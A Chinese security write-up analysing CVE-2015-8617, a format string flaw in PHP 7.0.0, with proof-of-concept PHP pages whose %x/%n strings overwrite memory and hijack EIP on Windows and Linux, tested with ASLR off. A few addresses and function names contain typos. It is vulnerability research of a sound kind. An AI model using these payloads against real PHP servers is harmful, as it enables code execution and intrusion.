PHP7.0.0格式化字符串漏洞与EIP劫持分析

   <p>PHP7.0.0的这个格式化字符串漏洞是15年12月在exploit-db上发现的。当初发现时，笔者还在北京东北方向的某信息安全公司上班，那时比较忙，并未能深入探究。最近几天无意间又看到了这个漏洞，发现该漏洞多了一个CVE编号：CVE-2015-8617，于是深入地看了看这个漏洞，在这里对该格式化字符串漏洞进行一些简要分析，并讨论一下利用该漏洞劫持EIP的潜在方法，供各位读者参考。</p>    <h2><strong>1.</strong> <strong>引言</strong></h2>    <p>在PHP中有两个常见的格式化字符串函数，分别是sppintf()和vsppintf()，它们分别对应sprintf()函数和vsprintf()函数，这两个函数的声明为：</p>    <pre>  <code class="language-php">PHPAPI int spprintf( char **pbuf, size_t max_len, const char *format, ...);    PHPAPI int vspprintf(char **pbuf, size_t max_len, const char *format, va_list ap);</code></pre>    <p>通过其函数声明可以看到，spprintf()接收可变数量的参数，而vspprintf()仅接收4个参数。</p>    <p>虽然这两个函数的内部实现原理是类似的，但笔者不打算就此点进行深入讨论，如有感兴趣读者，可以看一看《程序员的自我修养》一书。关于格式化字符串漏洞的分析文章普遍集中于sprintf()函数，而在本文中则需要重点讨论一下vsprintf()函数，即着重讨论下PHP中的vspprintf()函数。</p>    <h2><strong>2.</strong> <strong>漏洞分析</strong></h2>    <p>本文所研究的vspprintf()函数在zend_throw_error()函数中，当触发漏洞时，zend_throw_error()函数由zend_throw_or_error()函数调用。zend_throw_or_error()函数不是很长，所以复制其代码如下：</p>    <pre>  <code class="language-php">static void zend_throw_or_error(int fetch_type, zend_class_entry *exception_ce, const char *format, ...)  {                   va_list va;                   char *message = NULL;                    va_start(va, format);                   zend_vspprintf(&message, 0, format, va);                    if (fetch_type & ZEND_FETCH_CLASS_EXCEPTION) {                   zend_throw_error(exception_ce,  message); //vul_func                      //zend_throw_error(exception_ce,  "%s", message);  patched in  the subsequent version                  } else {                   zend_error(E_ERROR, "%s", message);                    }                     efree(message);                   va_end(va);                  }</code></pre>    <p>在上述代码段中，触发漏洞的函数调用已用红色笔标明出，由于调用时少了一个参数导致触发了格式化字符串漏洞。该漏洞的补丁也用红色笔在代码中标明了。</p>    <p>关于该格式化字符串漏洞，并没有很多需要分析说明的地方，下面开始分别从windows和linux两个环境中讨论利用该漏洞劫持EIP的方法。</p>    <h2><strong>3.windows</strong> <strong>环境下分析</strong></h2>    <p>为了减少在win7环境下的分析难度，笔者暂且把ASLR关掉。若计划实现稳定的EIP劫持，可能还需要通过其他手段获取一些模块基址，当然这PHP7.0.0格式化字符串漏洞本身也可以泄露一部分有用的内存数据。</p>    <p>在windows版本的PHP中，其漏洞函数位于php7ts.dll动态链接库中，构造php页面如下：</p>    <pre>  <code class="language-php"><?php                  $name="%n%n";                  $name::doSomething();                  ?></code></pre>    <p>通过调试器启动PHP解析该php页面，执行到程序崩溃时，通过栈回溯，可以找到vspprintf()函数调用（该函数是导出函数，也可以直接在导出表中找到此函数），在该函数的函数头下断点，重新执行，找到即将触发漏洞的某次调用。此时，观察栈中的数据：</p>    <p style="text-align:center"><img src="https://simg.open-open.com/show/6dbdf3e7ce3242d260ff524958126ed8.jpg"></p>    <p>上图中，栈顶是函数返回地址，即返回到zend_throw_error()函数中，接下来的是vspprintf()函数的四个参数。其中，0441E890即为va_list类型的参数。</p>    <p>这里需要指出的是，如果是传统的spprintf()函数的格式化字符串溢出，则只需要不断地利用%x递增栈上参数数量，最后利用%n实现覆盖函数返回地址即可有效地实现劫持EIP。但是此处是vspprintf()函数的，只接受4个参数，所以如果打算继续劫持EIP，则需要研究一下va_list，va_list在不同环境下的定义略有不同，这里我们可以粗略地定义va_list类型如下：</p>    <pre>  <code class="language-php">#define va_list void*</code></pre>    <p>即认为va_list是一个指向可变数量参数的指针。在vspprintf()函数中，对于%x的处理是直接取va_list指向的内容，如下图：</p>    <p style="text-align:center"><img src="https://simg.open-open.com/show/02239c382c90b533d240b4ecc38d4772.jpg"></p>    <p>其中，0441E890即为va_list的起始地址，通过图1的第四个参数可以观察到。对于第一个%x，则输出0565D3C0；对于第二个%x，则输出96E436E2；对于第三个%x，则输出0441E8C4，以此类推下去。</p>    <p>在vspprintf()函数中，对于%n的处理则较为麻烦，它不会像%x那样直接依次地读写下去，而是取va_list指向的参数表的每个参数作为指针，进而覆盖该指针所指向的内容。结合图2，具体叙述如下：对于第一个%n，则覆盖0565D3C0所指向的内容，对于第二个%n，则覆盖96E436E2所指向的内容，此时PHP就崩溃了，因为该地址是无效的。</p>    <p>此时，是无法直接覆盖函数的返回地址。为实现劫持EIP的目的，需要在栈上找一个二级指针。该二级指针取值第一次为保存函数返回地址变量的地址，取值两次为函数返回地址变量的值。但笔者在栈上并没有找到所需的二级指针，所以，笔者只能选择构造一个这样子的指针，其构造方法如下：</p>    <p>1，首先在栈上选择一个合适位置，该位置存储内容指向栈的另一个位置，指向位置大于且接近该位置的地址。</p>    <p>复制部分栈内容如下：</p>    <pre>  <code class="language-php">0441E890   0565D3C0  0441E894   96E436E2  0441E898   0441E8C4< ------- 合适  0441E89C   102F8BE2  0441E8A0   00000200</code></pre>    <p>正如上表所示，0441E8C4就是4字节对齐的，大于且接近0441E898，是一个非常合适的栈位置。</p>    <p>2，通过上一步找到的合适位置，覆盖0441E8C4的内容，使其指向栈上保存函数返回地址的地址。</p>    <p>在笔者调试时，将其覆盖为0441E82C，即当前函数返回到vspprintf()函数的返回地址：</p>    <p style="text-align:center"><img src="https://simg.open-open.com/show/8387d4d3aa2455bb313555d4445c4aca.jpg"></p>    <p>3，第一次覆盖之后，用%x继续在栈上滑行，直到0441E8C4的位置，此时将会第二次覆盖0441E82C的内容，使其指向我们需要跳转的位置，比方说跳转到04422222的位置。</p>    <p>按照上述思路，其栈空间的内容大致如下：</p>    <pre>  <code class="language-php">…  0441E824  96E40112  0441E828  96E43659  0441E82C   04422222 <-----第二次覆盖  0441E830  0565D3C0  0441E834  0441E890  …  0441E890  0565D3C0 < -----起始  0441E894  96E436E2  0441E898  0441E8C4 <-----合适位置  0441E89C   102F8BE2  0441E8A0   00000200  …  0441E8BC    05614006  0441E8C0   96E436C2  0441E8C4    0441E82C <-----第一次覆盖  0441E8C8   103865E9  0441E8CC    056631C0  …</code></pre>    <p>基于此，笔者尝试构造php页面如下：</p>    <pre>  <code class="language-php"><?php                  $name="%71428125x%x%n%x%x%x%x%x%x%x%x%x%14788x%n";                  $name::doSomething();                  ?></code></pre>    <p>当PHP解析该页面的时候，首先输出2个%x后，遇到第一个%n，则会覆盖0441E8C4覆盖为0441E82C；继续跳过10个%x后，遇到第二个%n，则会覆盖0441E82C覆盖为04422222。</p>    <p>其运行结果如下图所示：</p>    <p style="text-align:center"><img src="https://simg.open-open.com/show/a6d4f0771a8ebf08a4d83f377310d269.jpg"></p>    <p>单步执行后，就会来到04422222的位置：</p>    <p style="text-align:center"><img src="https://simg.open-open.com/show/43ae00bfa8082c264bd25efd7022070c.jpg"></p>    <p>Windows环境下的分析就到此位置，至于出现的几个常数：71428125和14788以及10个%x从何而来，相信读者自己也能想到。至于是否可以在栈上构造一些合适的数据，最后通过ROP实现EXP，这点也留给读者自己考虑分析一下吧。</p>    <h2><strong>4.Linux</strong> <strong>环境下分析</strong></h2>    <p>Linux环境下，同样先把ASLR关掉，用以减少我们的分析难度。与Windows环境下的分析略有不同，由于Linux环境下的栈基址比较高，如下图所示：</p>    <p style="text-align:center"><img src="https://simg.open-open.com/show/f3c2c000870c368bc21cd72ed2a47b1a.jpg"></p>    <p>声明一个如此之长的字符串，容易出现各种各样的问题，所以笔者只好放弃直接覆盖函数返回地址实现劫持EIP的方法。</p>    <p>这里考虑另一种劫持EIP的方法，覆盖对象虚表的方法（一般情况下有三种常见的方法，在笔者之前的分析《kill.exe溢出漏洞分析与EXP讨论》中有提到，感兴趣的读者可以看一下）。构造合适的php页面，令PHP不崩溃，而是让其继续下去的话，就会发现PHP接下来将要调用_object_init_ex()函数，初始化异常对象。该初始化函数会进一步调用object_and_properties_init()函数，而在此函数中，会调用对象虚表中的函数，关键代码段如下：</p>    <pre>  <code class="language-php">object_and_properties_init()                  {                      …                       mov ebx, [esp+0Ch+class_type]                      …                       mov eax, [ebx+0FCh]                      …                      call eax              ; call    [[esp+0Ch+class_type]+0FCh]                      …                   }</code></pre>    <p>考虑到此时存储在[esp+0Ch+class_type]+0FCh的值比较小，可以尝试利用此处的call eax实现劫持EIP。</p>    <p>选择在第3章节描述的二次覆盖方法，可以构造栈空间如下：</p>    <pre>  <code class="language-php">…  08948F5C 08945D4C  08948F60 08945D50  08948F64 08955555 < -----第二次覆盖  08948F68 00000000  08948F6C 00000000  …  BFFFBF94 B5C650A0< -----起始  BFFFBF98 087F41E7  BFFFBF9C BFFFBFCC < -----合适位置  BFFFBFA0 0895F890  BFFFBFA4 00000000  …  BFFFBFC4 00000000  BFFFBFC8 087F41E7  BFFFBFCC 08948F64< -----第一次覆盖  BFFFBFD0 B5C14020  BFFFBFD4 B5C74054  …</code></pre>    <p>基于以上讨论，笔者构造php页面如下：</p>    <pre>  <code class="language-php"><?php                  ini_set("memory_limit", "2G");                  $name="%143953757x%n%x%x%x%x%x%x%x%x%x%x%50621x%n";                  $name::doSomething();                  ?></code></pre>    <p>当PHP在解析该页时，第一次遇到%n将会覆盖8FFFBFCC位置的数据为08948F64；而第二次遇到%n时，将08948F4位置的数据覆盖为08955555。此后，程序会正常执行，直到call eax指令的位置：</p>    <p style="text-align:center"><img src="https://simg.open-open.com/show/989a94c65183d5d08ab0ef8b2377df94.jpg"></p>    <p>此时，PHP将跳转到我们指定的地址继续执行，在上图中为8955555地址。</p>    <p>值得庆幸的是，在Linux环境中，并没有Windows环境的CFG保护。如果存在CFG保护，即有/GUARD:CF标记，将可能导致此种利用方式失败。</p>    <p>Linux环境下的分析也就到此位置，至于出现的几个常数：143953757和50621以及11个%x从何而来，相信读者自己也能想到。至于是否可以实现有效的EXP，这点也留给读者自己考虑分析一下吧。</p>    <h2><strong>5.</strong> <strong>小结</strong></h2>    <p>本文简要地分析了PHP7.0.0格式化字符串漏洞，并在windows和linux两种不同的环境下，给出了运用该漏洞劫持EIP的方法。但需要指出的是，本文所有的分析都在禁用了ASLR的场景之下进行的，若打算实际利用该漏洞，还需要获取一些模块基址等其他有用信息。而关于这些，笔者就不再多说，还是交给感兴趣的读者自己研究吧。</p>    <p> </p>    <p>来自：http://www.freebuf.com/vuls/116398.html</p>    <p> </p>